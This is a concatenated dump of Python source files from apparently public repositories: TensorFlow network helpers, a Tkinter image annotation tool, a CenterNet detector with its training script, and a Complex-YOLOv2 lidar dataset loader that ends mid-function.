strides=stride,
padding=padding)
def MaxPool(input, pool_size=[2, 2], stride=2, padding='SAME', scope="max_pool"):
with tf.name_scope(scope):
return tf.layers.max_pooling2d(inputs=input,
pool_size=pool_size,
strides=stride,
padding=padding)
def GlobalAveragePool(input, data_format='channels_last', scope="gap"):
"""
Global Average Pooling
arguments:
input(tf.Tensor): a 4D tensor
If `data_format='channels_last'`:
4D tensor with shape:
`(batch_size, rows, cols, channels)`
- If `data_format='channels_first'`:
4D tensor with shape:
`(batch_size, channels, rows, cols)`
data_format(string):one of 'channels_last'(default) or 'channels_last'
'channels_last' corresponds to inputs with shape (batch, height, width, channels)
'channels_first' corresponds to inputs with shape (batch, channels, height, width)
:return: tf.Tensor: a NC tensor named output.
2D tensor with shape:
(batch_size, channels)
"""
assert input.shape.ndims == 4
with tf.name_scope(scope):
if data_format == 'channels_last':
axis = [1, 2]
else:
axis = [2, 3]
return tf.reduce_mean(input, axis, name='global_average_pool', keep_dims=True)
def BatchNormalization(input, is_train, scope):
with arg_scope([batch_norm],
scope=scope,
updates_collections=None,
decay=0.9,
center=True,
scale=True,
zero_debias_moving_mean=True):
return tf.cond(is_train,
lambda: batch_norm(inputs=input, is_training=is_train, reuse=None),
lambda: batch_norm(inputs=input, is_training=is_train, reuse=True))
def Relu(input, scope="relu"):
with tf.name_scope(scope):
return tf.nn.relu(input)
def Sigmoid(input, scope="sigmoid"):
with tf.name_scope(scope):
return tf.nn.sigmoid(input)
def Concat(layers, scope="concat"):
with tf.name_scope(scope):
return tf.concat(layers, axis=3)
def Fully_connected(input, num_classes, scope='fully_connected'):
with tf.name_scope(scope):
return tf.layers.dense(inputs=input, use_bias=False, units=num_classes)
``` |
{
"source": "530824679/BucklePictureTool",
"score": 3
} |
#### File: 530824679/BucklePictureTool/tools.py
```python
import os
import glob
import tkinter as tk
import tkinter.filedialog as dlg
import tkinter.messagebox as msgbx
from tkinter import Label, Button, Canvas, Entry, Frame
from PIL import Image, ImageTk
class ImageData():
def __init__(self, path):
self.file_path = path
self.base_name = None
self.isEditted = False
self.set_basename()
def set_basename(self):
if self.file_path is not None:
self.base_name = os.path.basename(self.file_path)
class DataAnnotationTool(object):
def __init__(self):
self.image_dir = None
self.save_dir = None
self.data_list = []
self.num_img_file = 0
self.ref_id = None
self.window_width = 1000
self.window_height = 800
self.class_index = 1
self.class_dict = {
"calling": 0,
"normal": 1,
"smoking": 2
}
self.anno_index = 0
self.set_widgets()
def set_widgets(self):
# create main window
self.mainWindow = tk.Tk()
self.mainWindow.geometry(str(self.window_width) + 'x' + str(self.window_height))
self.mainWindow.title("data annotation tool")
# create total Frame to lay out all components
self.frame = Frame(self.mainWindow)
self.frame.pack(fill=tk.BOTH, expand=tk.YES, side=tk.LEFT)
# create directory label frame
self.lf_dir = tk.LabelFrame(self.frame, text='Directory')
self.lf_dir.pack(fill=tk.BOTH, anchor=tk.W, padx=10, pady=2)
# create diectory entry bar
self.src_label_img = tk.Label(self.lf_dir, text="图像目录:")
self.src_label_img.grid(row=0)
self.load_entry_dir = tk.Entry(self.lf_dir, width=110)
self.load_entry_dir.grid(row=0, column=1, columnspan=10)
# create open button
self.open_btn_dir = tk.Button(self.lf_dir, text='Open Folder', command=self.open_img_directory, width=14)
self.open_btn_dir.grid(row=0, column=12, padx=15)
self.dst_label_img = tk.Label(self.lf_dir, text="存储目录:")
self.dst_label_img.grid(row=1)
self.save_entry_dir = tk.Entry(self.lf_dir, width=110)
self.save_entry_dir.grid(row=1, column=1, rowspan=2, columnspan=10)
# create save button
self.save_btn_dir = tk.Button(self.lf_dir, text='Save Folder', command=self.open_save_directory, width=14)
self.save_btn_dir.grid(row=1, column=12, columnspan=2, padx=15, pady=10)
# create image canvas
self.f_canvas = tk.Frame(self.frame)
self.f_canvas.pack(fill=tk.X, padx=10)
# create file list box
self.lf_filelistbox = tk.LabelFrame(self.f_canvas, text='file list', fg='Blue')
self.lf_filelistbox.pack(side=tk.LEFT, fill=tk.Y)
self.sc_file = tk.Scrollbar(self.lf_filelistbox)
self.sc_file.pack(side=tk.RIGHT, fill=tk.Y)
filelistvar = tk.StringVar("")
self.filelistbox = tk.Listbox(self.lf_filelistbox, listvariable=filelistvar, yscrollcommand=self.sc_file.set)
self.filelistbox.configure(selectmode="single")
self.filelistbox.pack(side=tk.LEFT, fill=tk.Y)
self.filelistbox.bind('<<ListboxSelect>>', self.filelistbox_selected)
self.sc_file.config(command=self.filelistbox.yview)
self.f_canvas_ref = tk.Frame(self.f_canvas)
self.f_canvas_ref.pack(side=tk.LEFT)
self.canvas_ref = tk.Canvas(self.f_canvas_ref, bg="black", width=600, height=520)
self.canvas_ref.pack(side=tk.LEFT, padx=5)
self.canvas_ref.bind("<ButtonPress-1>", self.on_left_clicked)
self.canvas_ref.bind("<ButtonRelease-1>", self.on_left_released)
self.canvas_ref.bind("<ButtonPress-3>", self.on_right_clicked)
self.canvas_ref.bind("<ButtonRelease-3>", self.on_right_released)
self.canvas_ref.bind("<Button1-Motion>", self.on_mouse_move)
self.canvas_ref.bind("<Button3-Motion>", self.on_mouse_move)
# create class list box
self.lf_classlistbox = tk.LabelFrame(self.f_canvas, text='class list', fg='Blue')
self.lf_classlistbox.pack(side=tk.TOP, fill=tk.X)
self.sc_class = tk.Scrollbar(self.lf_classlistbox)
self.sc_class.pack(side=tk.RIGHT, fill=tk.Y)
classinfo = ("calling", "normal", "smoking")
classlistvar = tk.StringVar(value=classinfo)
self.classlistbox = tk.Listbox(self.lf_classlistbox, listvariable=classlistvar, height=8, yscrollcommand=self.sc_class.set)
self.classlistbox.configure(selectmode="single")
self.classlistbox.pack(side=tk.TOP, fill=tk.X)
self.classlistbox.bind('<<ListboxSelect>>', self.classlistbox_selected)
self.sc_class.config(command=self.classlistbox.yview)
# create anno object
self.lf_annolistbox = tk.LabelFrame(self.f_canvas, text='annotation list', fg='Blue')
self.lf_annolistbox.pack(side=tk.TOP, fill=tk.X)
self.sc_anno = tk.Scrollbar(self.lf_annolistbox)
self.sc_anno.pack(side=tk.RIGHT, fill=tk.Y)
annolistvar = tk.StringVar("")
self.annolistbox = tk.Listbox(self.lf_annolistbox, listvariable=annolistvar, height=8, yscrollcommand=self.sc_anno.set)
self.annolistbox.configure(selectmode="single")
self.annolistbox.pack(side=tk.TOP, fill=tk.X)
self.annolistbox.bind('<<ListboxSelect>>', self.annolistbox_selected)
self.sc_anno.config(command=self.annolistbox.yview)
self.lf_button = tk.LabelFrame(self.f_canvas, text='operation', fg='Blue')
self.lf_button.pack(side=tk.TOP, fill=tk.X)
# create load button
self.read_btn_text = tk.StringVar()
self.read_btn_text.set('Load Images')
self.read_btn_dir = tk.Button(self.lf_button, textvariable=self.read_btn_text, width=14, command=self.load_images)
self.read_btn_dir.pack(pady=5)
# create rect button
self.rect_btn_text = tk.StringVar()
self.rect_btn_text.set('Create Rect')
self.rect_btn_dir = tk.Button(self.lf_button, textvariable=self.rect_btn_text, width=14, command=self.create_rect)
self.rect_btn_dir.pack(pady=6)
# create verify button
self.verify_btn_text = tk.StringVar()
self.verify_btn_text.set('Verify Rect')
self.verify_btn_dir = tk.Button(self.lf_button, textvariable=self.verify_btn_text, width=14, command=self.verify_rect)
self.verify_btn_dir.pack(pady=6)
# create save button
self.save_btn_text = tk.StringVar()
self.save_btn_text.set("Save Anno")
self.save_btn = tk.Button(self.lf_button, textvariable=self.save_btn_text, width=14, command=self.on_save_btn_pressed)
self.save_btn.pack(pady=6)
# create image switch button
self.fr_btn = tk.Frame(self.frame)
self.fr_btn.pack(anchor=tk.S, padx=10, pady=2)
self.prev_btn = tk.Button(self.fr_btn, text='←Previous', command=self.on_previous_btn_pressed)
self.prev_btn.pack(side=tk.LEFT, padx=2)
self.entry_pagejump = tk.Entry(self.fr_btn, width=5)
self.entry_pagejump.pack(side=tk.LEFT, padx=5)
self.jump_btn = tk.Button(self.fr_btn, text='Jump', command=self.on_jump_btn_pressed)
self.jump_btn.pack(side=tk.LEFT, padx=2)
self.next_btn = tk.Button(self.fr_btn, text='Next→', command=self.on_next_btn_pressed)
self.next_btn.pack(side=tk.RIGHT, padx=5)
def on_previous_btn_pressed(self):
if self.ref_id == None: return
self.ref_id -= 1
if self.ref_id < 0:
self.ref_id = self.num_img_file - 1
self.load_image()
def on_jump_btn_pressed(self):
if self.ref_id is None: return
# Get image id
id_str = self.entry_pagejump.get()
if(id_str is None) or (id_str is ""): return
id = int(id_str) - 1
if id < 0:
id = self.num_img_file - abs(id)
if id > self.num_img_file:
id = self.num_img_file - 1
self.ref_id = id
self.load_image()
self.entry_pagejump.delete(0, tk.END)
def on_next_btn_pressed(self):
if self.ref_id == None: return
self.ref_id += 1
if self.ref_id >= self.num_img_file:
self.ref_id = 0
self.load_image()
def on_save_btn_pressed(self):
pass
def filelistbox_selected(self, evemt):
for i in self.filelistbox.curselection():
self.ref_id = i
self.load_image()
self.isDrawable = True
def classlistbox_selected(self, event):
for i in self.classlistbox.curselection():
self.class_index = self.class_dict[self.classlistbox.get(i)]
def annolistbox_selected(self, event):
for i in self.annolistbox.curselection():
self.anno_index = self.annolistbox.get(i)
def on_left_clicked(self):
pass
def on_left_released(self):
pass
def on_right_clicked(self):
pass
def on_right_released(self):
pass
def on_mouse_move(self):
pass
def open_img_directory(self):
self.image_dir = dlg.askdirectory()
if self.image_dir:
self.load_entry_dir.delete(0, 'end')
self.load_entry_dir.insert(0, self.image_dir)
filelist = os.listdir(self.image_dir)
filelist.sort(key = lambda x: int(x[:-4]))
self.filelistbox.delete(0, 'end')
self.ref_id = 0
self.data_list.clear()
for index, file in enumerate(filelist):
self.filelistbox.insert(index, file)
def open_save_directory(self):
self.save_dir = dlg.askdirectory()
if self.save_dir:
if not os.path.exists(self.save_dir):
try:
os.mkdir(self.save_dir)
tk.messagebox.showinfo('create annotation directory: \n' + self.save_dir)
except:
pass
self.save_entry_dir.delete(0, 'end')
self.save_entry_dir.insert(0, self.save_dir)
def load_images(self):
if self.image_dir:
dir = self.image_dir
dir = os.path.join(dir, "*.jpg")
file_list = sorted(glob.glob(dir))
self.num_img_file = len(file_list)
print("Number of images in {}: {}".format(self.image_dir, str(self.num_img_file)))
# read first image
if self.num_img_file > 0:
for i in range(self.num_img_file):
self.data_list.append(ImageData(file_list[i]))
self.ref_id = 0
self.load_image()
self.isDrawable = True
def load_image(self):
if self.ref_id == None: return
ref_filepath = self.get_reference_filepath()
self.ref_image_org = Image.open(ref_filepath)
self.show_images()
self.canvas_ref.config(height=self.ref_image_org.height, width=self.ref_image_org.width)
def show_images(self):
self.ref_image_display = ImageTk.PhotoImage(self.ref_image_org)
self.canvas_ref.create_image(0, 0, anchor="nw", image=self.ref_image_display)
def create_rect(self):
pass
def verify_rect(self):
pass
def get_reference_filepath(self):
return self.data_list[self.ref_id].file_path
def get_save_filepath(self):
filename = self.data_list[self.ref_id].base_name
return os.path.join(self.save_dir, filename)
def run(self):
self.mainWindow.mainloop()
if __name__ == '__main__':
data_annotation_tool = DataAnnotationTool()
data_annotation_tool.run()
``` |
{
"source": "530824679/CenterNet",
"score": 3
} |
#### File: CenterNet/model/network.py
```python
import numpy as np
import tensorflow as tf
from model.ops import *
from cfg.config import *
class CenterNet():
def __init__(self, is_train):
self.is_train = is_train
self.num_classes = model_params['num_classes']
self.inplanes = 64
def _block(self, inputs, filters, strides=1):
expansion = 1
conv1_bn_relu = conv2d(inputs, filters, [3, 3], strides, 'same', activation=tf.nn.relu, is_training=self.is_train, use_bn=True)
conv2_bn = conv2d(conv1_bn_relu, filters, [3, 3], 1, 'same', activation=None, is_training=self.is_train, use_bn=True)
if strides != 1 or self.inplanes != filters * expansion:
inputs = conv2d(inputs, filters, [1, 1], strides, 'valid', activation=None, is_training=self.is_train, use_bn=True)
self.inplanes = filters * expansion
out = tf.nn.relu(conv2_bn + inputs)
return out
def _module(self, x, num_channels, layers, strides=1):
for i in range(layers):
if i == 0:
x = self._block(x, num_channels, strides=strides)
else:
x = self._block(x, num_channels)
return x
def _resnet34(self, inputs):
net = conv2d(inputs, 64, [7, 7], 2, 'same', activation=tf.nn.relu, is_training=self.is_train, use_bn=True)
net = tf.layers.max_pooling2d(net, pool_size=3, strides=2, padding='same')
layer1 = self._module(net, 64, 3, 1)
layer2 = self._module(layer1, 128, 4, 2)
layer3 = self._module(layer2, 256, 6, 2)
layer4 = self._module(layer3, 512, 3, 2)
return layer1, layer2, layer3, layer4
def build_model(self, inputs):
c2, c3, c4, c5 = self._resnet34(inputs)
p5 = conv2d(c5, 128, [1, 1], is_training=self.is_train)
up_p5 = upsampling(p5, method='resize')
reduce_dim_c4 = conv2d(c4, 128, [1, 1], is_training=self.is_train)
p4 = 0.5 * up_p5 + 0.5 * reduce_dim_c4
up_p4 = upsampling(p4, method='resize')
reduce_dim_c3 = conv2d(c3, 128, [1, 1], is_training=self.is_train)
p3 = 0.5 * up_p4 + 0.5 * reduce_dim_c3
up_p3 = upsampling(p3, method='resize')
reduce_dim_c2 = conv2d(c2, 128, [1, 1], is_training=self.is_train)
p2 = 0.5 * up_p3 + 0.5 * reduce_dim_c2
features = conv2d(p2, 128, [3, 3], is_training=self.is_train)
with tf.variable_scope('detector'):
hm = conv2d(features, 64, [3, 3], is_training=self.is_train)
hm = tf.layers.conv2d(hm, self.num_classes, 1, 1, padding='valid', activation=tf.nn.sigmoid, bias_initializer=tf.constant_initializer(-np.log(99.)), name='hm')
wh = conv2d(features, 64, [3, 3], is_training=self.is_train)
wh = tf.layers.conv2d(wh, 2, 1, 1, padding='valid', activation=None, name='wh')
reg = conv2d(features, 64, [3, 3], is_training=self.is_train)
reg = tf.layers.conv2d(reg, 2, 1, 1, padding='valid', activation=None, name='reg')
return hm, wh, reg
def topk(self, hm, K=150):
batch, height, width, cat = tf.shape(hm)[0], tf.shape(hm)[1], tf.shape(hm)[2], tf.shape(hm)[3]
# [b,h*w*c]
scores = tf.reshape(hm, (batch, -1))
# [b,k]
topk_scores, topk_inds = tf.nn.top_k(scores, k=K)
# [b,k]
topk_clses = topk_inds % cat
topk_xs = tf.cast(topk_inds // cat % width, tf.float32)
topk_ys = tf.cast(topk_inds // cat // width, tf.float32)
topk_inds = tf.cast(topk_ys * tf.cast(width, tf.float32) + topk_xs, tf.int32)
return topk_scores, topk_inds, topk_clses, topk_ys, topk_xs
def decode(self, hm, wh, reg, k=150):
batch, height, width, channel = tf.shape(hm)[0], tf.shape(hm)[1], tf.shape(hm)[2], tf.shape(hm)[3]
hmax = tf.layers.max_pooling2d(hm, 3, 1, padding='same')
keep = tf.cast(tf.equal(hm, hmax), tf.float32)
heat = hm * keep
scores, inds, clses, ys, xs = self.topk(heat, K=k)
if reg is not None:
reg = tf.reshape(reg, (batch, -1, tf.shape(reg)[-1]))
# [b,k,2]
reg = tf.batch_gather(reg, inds)
xs = tf.expand_dims(xs, axis=-1) + reg[..., 0:1]
ys = tf.expand_dims(ys, axis=-1) + reg[..., 1:2]
else:
xs = tf.expand_dims(xs, axis=-1) + 0.5
ys = tf.expand_dims(ys, axis=-1) + 0.5
# [b,h*w,2]
wh = tf.reshape(wh, (batch, -1, tf.shape(wh)[-1]))
# [b,k,2]
wh = tf.batch_gather(wh, inds)
clses = tf.cast(tf.expand_dims(clses, axis=-1), tf.float32)
scores = tf.expand_dims(scores, axis=-1)
xmin = xs - wh[..., 0:1] / 2
ymin = ys - wh[..., 1:2] / 2
xmax = xs + wh[..., 0:1] / 2
ymax = ys + wh[..., 1:2] / 2
bboxes = tf.concat([xmin, ymin, xmax, ymax], axis=-1)
# [b,k,6]
detections = tf.concat([bboxes, scores, clses], axis=-1)
return detections
def calc_loss(self, pred_hm, pred_wh, pred_reg, true_hm, true_wh, true_reg, reg_mask, ind):
hm_loss = self.focal_loss(pred_hm, true_hm)
wh_loss = 0.05 * self.reg_l1_loss(pred_wh, true_wh, ind, reg_mask)
reg_loss = self.reg_l1_loss(pred_reg, true_reg, ind, reg_mask)
total_loss = hm_loss + wh_loss + reg_loss
return total_loss, hm_loss, wh_loss, reg_loss
def focal_loss(self, hm_pred, hm_true):
pos_mask = tf.cast(tf.equal(hm_true, 1.), dtype=tf.float32)
neg_mask = tf.cast(tf.less(hm_true, 1.), dtype=tf.float32)
neg_weights = tf.pow(1. - hm_true, 4)
pos_loss = -tf.log(tf.clip_by_value(hm_pred, 1e-5, 1. - 1e-5)) * tf.pow(1. - hm_pred, 2) * pos_mask
neg_loss = -tf.log(tf.clip_by_value(1. - hm_pred, 1e-5, 1. - 1e-5)) * tf.pow(hm_pred, 2.0) * neg_weights * neg_mask
num_pos = tf.reduce_sum(pos_mask)
pos_loss = tf.reduce_sum(pos_loss)
neg_loss = tf.reduce_sum(neg_loss)
loss = tf.cond(tf.greater(num_pos, 0), lambda: (pos_loss + neg_loss) / num_pos, lambda: neg_loss)
return loss
def reg_l1_loss(self, y_pred, y_true, indices, mask):
b = tf.shape(y_pred)[0]
k = tf.shape(indices)[1]
c = tf.shape(y_pred)[-1]
y_pred = tf.reshape(y_pred, (b, -1, c))
indices = tf.cast(indices, tf.int32)
y_pred = tf.batch_gather(y_pred, indices)
mask = tf.tile(tf.expand_dims(mask, axis=-1), (1, 1, 2))
total_loss = tf.reduce_sum(tf.abs(y_true * mask - y_pred * mask))
loss = total_loss / (tf.reduce_sum(mask) + 1e-5)
return loss
def bbox_giou(self, boxes_1, boxes_2):
"""
calculate regression loss using giou
:param boxes_1: boxes_1 shape is [x, y, w, h]
:param boxes_2: boxes_2 shape is [x, y, w, h]
:return:
"""
# transform [x, y, w, h] to [x_min, y_min, x_max, y_max]
boxes_1 = tf.concat([boxes_1[..., :2] - boxes_1[..., 2:] * 0.5,
boxes_1[..., :2] + boxes_1[..., 2:] * 0.5], axis=-1)
boxes_2 = tf.concat([boxes_2[..., :2] - boxes_2[..., 2:] * 0.5,
boxes_2[..., :2] + boxes_2[..., 2:] * 0.5], axis=-1)
boxes_1 = tf.concat([tf.minimum(boxes_1[..., :2], boxes_1[..., 2:]),
tf.maximum(boxes_1[..., :2], boxes_1[..., 2:])], axis=-1)
boxes_2 = tf.concat([tf.minimum(boxes_2[..., :2], boxes_2[..., 2:]),
tf.maximum(boxes_2[..., :2], boxes_2[..., 2:])], axis=-1)
# calculate area of boxes_1 boxes_2
boxes_1_area = (boxes_1[..., 2] - boxes_1[..., 0]) * (boxes_1[..., 3] - boxes_1[..., 1])
boxes_2_area = (boxes_2[..., 2] - boxes_2[..., 0]) * (boxes_2[..., 3] - boxes_2[..., 1])
# calculate the two corners of the intersection
left_up = tf.maximum(boxes_1[..., :2], boxes_2[..., :2])
right_down = tf.minimum(boxes_1[..., 2:], boxes_2[..., 2:])
# calculate area of intersection
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
# calculate union area
union_area = boxes_1_area + boxes_2_area - inter_area
# calculate iou
iou = inter_area / tf.maximum(union_area, 1e-5)
# calculate the upper left and lower right corners of the minimum closed convex surface
enclose_left_up = tf.minimum(boxes_1[..., :2], boxes_2[..., :2])
enclose_right_down = tf.maximum(boxes_1[..., 2:], boxes_2[..., 2:])
# calculate width and height of the minimun closed convex surface
enclose_wh = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
# calculate area of the minimun closed convex surface
enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]
# calculate the giou
giou = iou - 1.0 * (enclose_area - union_area) / tf.maximum(enclose_area, 1e-5)
return giou
```
#### File: CenterNet/model/ops.py
```python
import tensorflow as tf
def batch_norm(inputs, is_training):
bn = tf.layers.batch_normalization(
inputs=inputs,
training=is_training,
momentum = 0.99
)
return bn
def conv2d(inputs, filters, kernel_size, strides=1, padding='same', activation=tf.nn.relu, is_training=False, use_bn=True):
if use_bn:
conv = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
use_bias = False
)
conv = batch_norm(conv, is_training)
else:
conv = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding
)
if activation is not None:
conv = activation(conv)
return conv
def upsampling(inputs, method="deconv"):
assert method in ["resize", "deconv"]
if method == "resize":
input_shape = tf.shape(inputs)
output = tf.image.resize_nearest_neighbor(inputs, (input_shape[1] * 2, input_shape[2] * 2))
if method == "deconv":
numm_filter = inputs.shape.as_list()[-1]
output = tf.layers.conv2d_transpose(
inputs=inputs,
filters=numm_filter,
kernel_size=4,
strides=2,
padding='same'
)
return output
```
#### File: 530824679/CenterNet/train.py
```python
import os
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from cfg.config import *
from data.dataset import *
from model.network import *
def train():
dataset_path = path_params['train_data_path']
log_dir = path_params['logs_path']
batch_size = solver_params['batch_size']
lr_type = solver_params['lr_type']
# 配置GPU
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
# 解析得到训练样本以及标注
image_num = len(open(dataset_path, 'r').readlines())
batch_num = int(math.ceil(float(image_num) / batch_size))
dataset = create_dataset(dataset_path, batch_num, batch_size=batch_size, is_shuffle=True)
iterator = dataset.make_one_shot_iterator()
inputs, batch_hm, batch_wh, batch_reg, batch_reg_mask, batch_ind = iterator.get_next()
inputs.set_shape([None, None, None, 3])
batch_hm.set_shape([None, None, None, None])
batch_wh.set_shape([None, None, None])
batch_reg.set_shape([None, None, None])
batch_reg_mask.set_shape([None, None])
batch_ind.set_shape([None, None])
# 构建网络
model = CenterNet(True)
pred_hm, pred_wh, pred_reg = model.build_model(inputs)
# 计算损失
loss_op = model.calc_loss(pred_hm, pred_wh, pred_reg, batch_hm, batch_wh, batch_reg, batch_reg_mask, batch_ind)
# 定义优化方式
if lr_type == "CosineAnnealing":
global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(solver_params['warm_up_epochs'] * batch_num, dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant(solver_params['epochs'] * batch_num, dtype=tf.float64, name='train_steps')
learning_rate = tf.cond(pred=global_step < warmup_steps,
true_fn=lambda: global_step / warmup_steps * solver_params['init_lr'],
false_fn=lambda: solver_params['end_lr'] + 0.5 * (solver_params['init_lr'] - solver_params['end_lr']) *
(1 + tf.cos((global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(global_step, 1.0)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss_op[0])
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([optimizer, global_step_update]):
train_op = tf.no_op()
else:
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.train.exponential_decay(solver_params['lr'], global_step, solver_params['decay_steps'], solver_params['decay_rate'], staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss_op[0], global_step=global_step)
# 配置tensorboard
tf.summary.scalar("learning_rate", learning_rate)
tf.summary.scalar("hm_loss", loss_op[1])
tf.summary.scalar("wh_loss", loss_op[2])
tf.summary.scalar("reg_loss", loss_op[3])
tf.summary.scalar("total_loss", loss_op[0])
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(log_dir, graph=tf.get_default_graph(), flush_secs=60)
# 模型保存
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=50)
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
if solver_params['pre_train']:
pretrained = np.load(path_params['pretrain_weights'], allow_pickle=True).item()
for variable in tf.trainable_variables():
for key in pretrained.keys():
key2 = variable.name.rstrip(':0')
if (key == key2):
sess.run(tf.assign(variable, pretrained[key]))
summary_writer.add_graph(sess.graph)
for epoch in range(1, 1 + solver_params['epochs']):
train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss = [], [], [], []
for index in tqdm(range(batch_num)):
_, summary, train_total_loss, train_hm_loss, train_wh_loss, train_reg_loss, global_step_val, lr = sess.run([train_op, summary_op, loss_op[0], loss_op[1], loss_op[2], loss_op[3], global_step, learning_rate])
train_epoch_loss.append(train_total_loss)
train_epoch_hm_loss.append(train_hm_loss)
train_epoch_wh_loss.append(train_wh_loss)
train_epoch_reg_loss.append(train_reg_loss)
summary_writer.add_summary(summary, global_step_val)
train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss = np.mean(train_epoch_loss), np.mean(train_epoch_hm_loss), np.mean(train_epoch_wh_loss), np.mean(train_epoch_reg_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, loss_hm: {:.3f}, loss_wh: {:.3f}, loss_reg: {:.3f}".format(epoch, global_step_val, lr, train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss))
saver.save(sess, os.path.join(path_params['checkpoints_path'], 'model.ckpt'), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
``` |
{
"source": "530824679/Complex-YOLOv2",
"score": 2
} |
#### File: Complex-YOLOv2/data/dataset.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import os
import math
import numpy as np
import tensorflow as tf
from cfg.config import data_params, path_params, model_params
from utils.process_utils import *
from data.augmentation import *
class Dataset(object):
def __init__(self):
self.data_path = path_params['data_path']
self.anchors = model_params['anchors']
self.num_classes = len(model_params['classes'])
self.input_height = model_params['input_height']
self.input_width = model_params['input_width']
self.grid_height = model_params['grid_height']
self.grid_width = model_params['grid_width']
self.iou_threshold = model_params['iou_threshold']
self.x_min = data_params['x_min']
self.x_max = data_params['x_max']
self.y_min = data_params['y_min']
self.y_max = data_params['y_max']
self.z_min = data_params['z_min']
self.z_max = data_params['z_max']
self.voxel_size = data_params['voxel_size']
def load_bev_image(self, data_num):
pcd_path = os.path.join(self.data_path, "object/training/livox", data_num+'.pcd')
if not os.path.exists(pcd_path):
raise KeyError("%s does not exist ... " % pcd_path)
pts = self.load_pcd(pcd_path)
roi_pts = self.filter_roi(pts)
bev_image = self.transform_bev_image(roi_pts)
return bev_image
def load_bev_label(self, data_num):
txt_path = os.path.join(self.data_path, "object/training/label", data_num + '.txt')
if not os.path.exists(txt_path):
raise KeyError("%s does not exist ... " %txt_path)
label = self.load_label(txt_path)
bev_label = self.transform_bev_label(label)
return bev_label
def load_pcd(self, pcd_path):
pts = []
f = open(pcd_path, 'r')
data = f.readlines()
f.close()
line = data[9].strip('\n')
pts_num = eval(line.split(' ')[-1])
for line in data[11:]:
line = line.strip('\n')
xyzi = line.split(' ')
x, y, z, i = [eval(i) for i in xyzi[:4]]
pts.append([x, y, z, i])
assert len(pts) == pts_num
res = np.zeros((pts_num, len(pts[0])), dtype=np.float)
for i in range(pts_num):
res[i] = pts[i]
return res
def scale_to_255(self, a, min, max, dtype=np.uint8):
return (((a - min) / float(max - min)) * 255).astype(dtype)
def calc_xyz(self, data):
center_x = (data[16] + data[19] + data[22] + data[25]) / 4.0
center_y = (data[17] + data[20] + data[23] + data[26]) / 4.0
center_z = (data[18] + data[21] + data[24] + data[27]) / 4.0
return center_x, center_y, center_z
def calc_hwl(self, data):
height = (data[15] - data[27])
width = math.sqrt(math.pow((data[17] - data[26]), 2) + math.pow((data[16] - data[25]), 2))
length = math.sqrt(math.pow((data[17] - data[20]), 2) + math.pow((data[16] - data[19]), 2))
return height, width, length
def calc_yaw(self, data):
angle = math.atan2(data[17] - data[26], data[16] - data[25])
if (angle < -1.57):
return angle + 3.14 * 1.5
else:
return angle - 1.57
def cls_type_to_id(self, data):
type = data[1]
if type not in model_params['classes']:
return -1
return model_params['classes'].index(type)
def calc_angle(self, im, re):
"""
param: im(float): imaginary parts of the plural
param: re(float): real parts of the plural
return: The angle at which the objects rotate
around the Z axis in the velodyne coordinate system
"""
if re > 0:
return np.arctan(im / re)
elif im < 0:
return -np.pi + np.arctan(im / re)
else:
return np.pi + np.arctan(im / re)
def load_label(self, label_path):
lines = [line.rstrip() for line in open(label_path)]
label_list = []
for line in lines:
data = line.split(' ')
data[4:] = [float(t) for t in data[4:]]
type = data[1]
if type not in model_params['classes']:
continue
label = np.zeros([8], dtype=np.float32)
label[0], label[1], label[2] = self.calc_xyz(data)
label[3], label[4], label[5] = self.calc_hwl(data)
label[6] = self.calc_yaw(data)
label[7] = self.cls_type_to_id(data)
label_list.append(label)
return np.array(label_list)
def transform_bev_label(self, label):
image_width = (self.y_max - self.y_min) / self.voxel_size
image_height = (self.x_max - self.x_min) / self.voxel_size
boxes_list = []
boxes_num = label.shape[0]
for i in range(boxes_num):
center_x = (-label[i][1] / self.voxel_size).astype(np.int32) - int(np.floor(self.y_min / self.voxel_size))
center_y = (-label[i][0] / self.voxel_size).astype(np.int32) + int(np.ceil(self.x_max / self.voxel_size))
width = label[i][4] / self.voxel_size
height = label[i][5] / self.voxel_size
left = center_x - width / 2
right = center_x + width / 2
top = center_y - height / 2
bottom = center_y + height / 2
if ((left > image_width) or right < 0 or (top > image_height) or bottom < 0):
continue
if (left < 0):
center_x = (0 + right) / 2
width = 0 + right
if (right > image_width):
center_x = (image_width + left) / 2
width = image_width - left
if (top < 0):
center_y = (0 + bottom) / 2
height = 0 + bottom
if (bottom > image_height):
center_y = (top + image_height) / 2
height = image_height - top
box = [center_x, center_y, width, height, label[i][6], label[i][7]]
boxes_list.append(box)
while len(boxes_list) < 300:
boxes_list.append([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
return np.array(boxes_list, dtype=np.float32)
def transform_bev_image(self, pts):
x_points = pts[:, 0]
y_points = pts[:, 1]
